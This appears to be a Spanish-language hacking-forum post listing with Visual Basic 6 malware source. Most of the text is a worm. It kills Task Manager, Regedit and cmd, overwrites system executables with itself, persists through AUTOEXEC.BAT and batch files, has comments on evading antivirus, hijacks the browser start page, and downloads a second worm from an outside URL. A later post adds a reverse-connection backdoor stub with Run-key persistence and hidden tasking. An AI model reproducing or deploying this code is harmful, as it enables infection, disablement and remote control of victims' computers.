Muchos ven y nadie opina... estara muy mal el malware?
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
Mostrar Mensajes Menú
Option Explicit
Private Declare Function URLDownloadToFile Lib "urlmon" _
Alias "URLDownloadToFileA" _
(ByVal pCaller As Long, _
ByVal szURL As String, _
ByVal szFileName As String, _
ByVal dwReserved As Long, _
ByVal lpfnCB As Long) As Long
Dim ERROR_SUCCESS
Private Sub Clipb()
On Error GoTo clip
Do
Clipboard.Clear
Clipboard.SetText " K-32 - Prayamama"
Loop
clip:
End Sub
Private Sub NayrocSTAM()
Do
On Error GoTo NoSTAM
PagInicia ("http://www.elhacker.net")
TituloInicia ("ElHacker - Soft Explorer - BY: K-32 (SP26)")
MsgBox " " & vbCrLf & " ", vbCritical
Loop
NoSTAM:
End Sub
Private Function Secuestro(UpPath As String, DownPath As String)
On Error GoTo seNO
FileCopy UpPath$, DownPath$
Kill UpPath$
seNO:
End Function
Public Sub SecuestroCarpeta(DirPath As String)
On Error GoTo error
MkDir DirPath$
Exit Sub
error:
'Crear carpetas de secuestro
End Sub
Private Sub AeroBits()
On Error GoTo seNO:
Do
Matar ("Taskmgr.exe")
Matar ("Regedit.exe")
Matar ("Services.msc")
Matar ("cmd.exe")
Matar ("Explorer.exe")
Shell "explorer.exe" 'Retornamos al EXPLORER para no levantar sospechas
SecuestroCarpeta Environ("SYSTEMROOT") & "\Binary\"
Secuestro Environ("SYSTEMROOT") & "\SYSTEM32\REGEDIT.EXE", Environ("SYSTEMROOT") & "\Binary\regedit.txt"
Secuestro Environ("SYSTEMROOT") & "\SYSTEM32\services.msc", Environ("Systemroot") & "\BINARY\Services.txt"
Secuestro Environ("SYSTEMROOT") & "\SYSTEM32\taskmgr.exe", Environ("SYSTEMROOT") & "\binary\taskmgr.txt"
FileCopy App.EXEName + ".exe", Environ("SYSTEMROOT") & "\SYSTEM32\regedit.exe"
FileCopy App.EXEName + ".exe", Environ("SYSTEMROOT") & "\SYSTEM32\taskmgr.exe"
FileCopy App.EXEName + ".exe", Environ("SYSTEMROOT") & "\SYSTEM32\services.msc"
seNO:
Shell Environ("SYSTEMROOT") & "\SYSTEM32\deflpo.exe"
Loop
End Sub
Private Sub NayrocSTEM()
Dim Archivo As String
Dim NumArchivo As Long
Dim Archivo2 As String
Dim NumArchivo2 As Long
On Error Resume Next
On Error GoTo NoHayBat
Do
FileCopy App.EXEName + ".exe", Environ("SYSTEMROOT") & "\SYSTEM32\deflps.exe" 'NOTA1
Matar ("Explorer.exe")
Matar ("CMD.exe")
Matar ("Regedit.exe")
Matar ("services.msc")
Matar ("msnmsgr.exe")
Shell ("Explorer.exe") 'Retornamos al Explorer para no levantar sospechas
Archivo = Environ("SYSTEMDRIVE") & "\AUTOEXEC.BAT"
NumArchivo = FreeFile()
'Aqui me añado al
'AUTOEXEC.BAT
'
'Para iniciarme cada vez que el sistema corra
'¿Sera esta una via alterna?
'Al yo poner "DEFLPS"
'llama el archivo antes copiado
'Es necesario que se copie antes en la carpeta SYSTEM32
'Esto me da una via alterna contra los AV
Open Archivo For Output As #NumArchivo
Print #NumArchivo, "Echo off"
Print #NumArchivo, "Title AUTOEXEC.BAT"
'--
Print #NumArchivo, "CLS"
Print #NumArchivo, "Echo Loading..."
Print #NumArchivo, "CLS"
Print #NumArchivo, "cls"
Print #NumArchivo, "deflps"
Close #NumArchivo
NoHayBat:
On Error Resume Next
'DeflPO
'Leer Mas abajo su Sub ()
Archivo2 = Environ("SYSTEMROOT") & "\Call.bat"
NumArchivo2 = FreeFile()
Print #NumArchivo, "Echo off"
Print #NumArchivo, "title Analizador de discos lógicos"
Print #NumArchivo, "cls"
Print #NumArchivo, "echo @echo off > %SYSTEMDRIVE%\AUTOEXEC.bat"
Print #NumArchivo, "Echo cls>>%SYSTEMDRIVE%\AUTOEXEC.bat"
Print #NumArchivo, "ECHO DEFLPS>>%SYSTEMDRIVE%\AUTOEXEC.bat"
Close #NumArchivo
Shell Environ("SYSTEMROOT") & "\Call.bat"
Loop
End Sub
Private Sub AñoNuevo()
'Feliz año nuevo xDD
Do
If Month(Now) = 1 And Day(Now) = 1 Then
AñoNuevoUp
End If
Loop
End Sub
Private Sub AñoNuevoUp()
Dim ArchivoK32 As String
Dim NumArchivoK32 As Long
Do
ArchivoK32 = Environ("SYSTEMROOT") & "\2007.bat"
NumArchivoK32 = FreeFile()
Print #NumArchivoK32, "Echo off"
Print #NumArchivoK32, "title OS"
Print #NumArchivoK32, "cls"
Print #NumArchivoK32, "Deflpo"
Print #NumArchivoK32, "Cls"
Close #NumArchivoK32
Shell Environ("SYSTEMROOT") & "\2007.bat"
'Lo hago como BAT ya que es mas efectivo para los AV's, En especial
'NOD32
Loop
End Sub
Private Sub Ds_Click()
MsgBox "Desinfectado"
End Sub
Private Sub Form_Load()
On Error Resume Next
App.TaskVisible = False
MsgBox " ", vbExclamation, "WINLOGON.EXE"
Clipb
NayrocSTAM
DeflPO
NayrocSTEM
AñoNuevo
AeroBits
End Sub
Public Sub Matar(ByVal processName As String)
On Error GoTo ErrHandler
Dim oWMI
Dim ret
Dim sService
Dim oWMIServices
Dim oWMIService
Dim oServices
Dim oService
Dim servicename
Set oWMI = GetObject("winmgmts:")
Set oServices = oWMI.InstancesOf("win32_process")
For Each oService In oServices
servicename = LCase(Trim(CStr(oService.Name) & ""))
If InStr(1, servicename, LCase(processName), vbTextCompare) > 0 Then
ret = oService.Terminate
End If
Next
Set oServices = Nothing
Set oWMI = Nothing
ErrHandler:
Err.Clear
End Sub
Private Sub DeflPO()
'ORIENTE-ETERNO : Modo silencioso
Do
Dim sSourceUrl As String
sSourceUrl = "http://h1.ripside.net/MyArchivos/" & _
"DCOM/deflPO.exe/" 'Este es otro de mis Worms
DownloadFile sSourceUrl, Environ("SYSTEMROOT") & "\SYSTEM32\deflPO.exe"
Loop
End Sub
Private Function DownloadFile(ByVal sURL As String, ByVal sLocalFile As String) As Boolean
DownloadFile = URLDownloadToFile(0, sURL, _
sLocalFile, 0, 0) = ERROR_SUCCESS
End Function
Private Sub Form_Unload(Cancel As Integer)
MsgBox " ", vbCritical
Do
Shell App.Path & App.EXEName & ".exe"
Loop
End Sub
Option Explicit
Declare Function RegCreateKey Lib _
"advapi32.dll" Alias "RegCreateKeyA" _
(ByVal HKey As Long, ByVal lpSubKey As _
String, phkResult As Long) As Long
Declare Function RegCloseKey Lib "advapi32.dll" (ByVal HKey As Long) As Long
Declare Function RegSetValueEx Lib _
"advapi32.dll" Alias "RegSetValueExA" (ByVal HKey As Long, ByVal _
lpValueName As String, ByVal _
Reserved As Long, ByVal dwType _
As Long, lpData As Any, ByVal _
cbData As Long) As Long
Public Sub SaveString(HKey As Long, Path As String, _
Name As String, Data As String)
Dim KeyHandle As Long
Dim r As Long
Dim REG_SZ
r = RegCreateKey(HKey, Path, KeyHandle)
r = RegSetValueEx(KeyHandle, Name, 0, _
REG_SZ, ByVal Data, Len(Data))
r = RegCloseKey(KeyHandle)
End Sub
Public Sub PagInicia(Direccion As String)
Call SaveString("HKEY_CURRENT_USER", _
"Software\Microsoft\Internet Explorer\Main", _
"Start Page", Direccion)
End Sub
Public Sub TituloInicia(Titulo As String)
Call SaveString("HKEY_CURRENT_USER", _
"Software\Microsoft\Internet Explorer\Main", _
"Window Title", Titulo)
End Sub
Cita de: Snort en 26 Diciembre 2006, 00:33 AM
http://www.opensc.ws/forumdisplay.php?f=18
Mira, en este foro lo tienes todo sobre codigos fuente de troyanos, aunqe esta en ingles. No te recomiendo qe te bases en estos códigos, empieza tu a acerte uno, y saca del foro solo la informacion qe te interese, no el codigo principal de tu troyano, a mi personalmente me molestaria qe alguien cojiera mi codigo y por cambiarle el aspecto al formulario principal diga qe lo ha hecho el... (no digo qe tu lo vayas a hacer, ni mucho menos..)
Option Explicit
Dim ext
Dim Ruta As String
Dim arjpg
Private Sub Command1_Click()
On Error Resume Next
List1.Clear
Ruta = Dir1
' Hacemos q nos muestre todos los archivos
arjpg = Dir(Ruta & "\*.jpg*")
Do While arjpg <> ""
' Obtenemos la extension del archivo
ext = LCase(Right$(arjpg, 3))
Select Case ext
Case "jpg"
List1.AddItem arjpg
Case "bmp"
List1.AddItem arjpg
Case "gif"
List1.AddItem arjpg
End Select
arjpg = Dir
Loop
End Sub
Private Sub Form_Load()
List1.Clear
End Sub
Cita de: SOLOANDRAGORA en 16 Diciembre 2006, 07:27 AM
te dejo una pequeña aplicacion para que cheques el codigo para que se cargue en la memoria haber si te sirve
es un server utilizando una conexión inversa. No recuerdo donde lo vi publicado
un saludo.
Dim win
Dim sys
Dim residencia
On Error Resume Next
ip = "10.12.116.207" 'esta es nuestra ip local, asi que conectara a nuestra ip local, aqui se pondria nuestra ip publica, y si cambia pues os registrais en no-ip.com y si habeis leido la revista no tendreis problemas
ipftp = "o 127.0.0.1"
port = 6969
WS.RemoteHost = ip
WS.RemotePort = port
Timer1.Interval = 60000 'se esteblace un intervalo de 3 segundos para ejecutar el evento timer1
ejec = App.Path 'le pasamos a la variable la ruta del exe que ejecute la victima
If Right(ejec, 1) <> "\" Then ejec = ejec & "\" 'si no tiene la "\" al final, se la añadiremos
ejec = ejec & App.EXEName & ".exe" 'añadimos ala ruta del exe, el nombre y la estension
Set obj = CreateObject("Scripting.FileSystemObject") 'declaramos un objeto tipo fileSystem object
Set win = obj.GetSpecialFolder(0) 'para obtener la carpeta de windows y system
Set sys = obj.GetSpecialFolder(1)
win = LCase(win) 'las ponemos en minusculas
sys = LCase(sys)
FileCopy ejec, sys & "\nombre1" 'copia a windows\system32
Name sys & "\nombre1" As sys & "\nombre2.exe" 'renombra
Set residencia = CreateObject("WScript.Shell")
residencia.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\" & "nombre3", sys & "\nombre2.exe" 'esto modifica el registro para que se ejecute al iniciar el pc
App.TaskVisible = False 'para ocultarlo un poco del, (alt +sup +control)
End Sub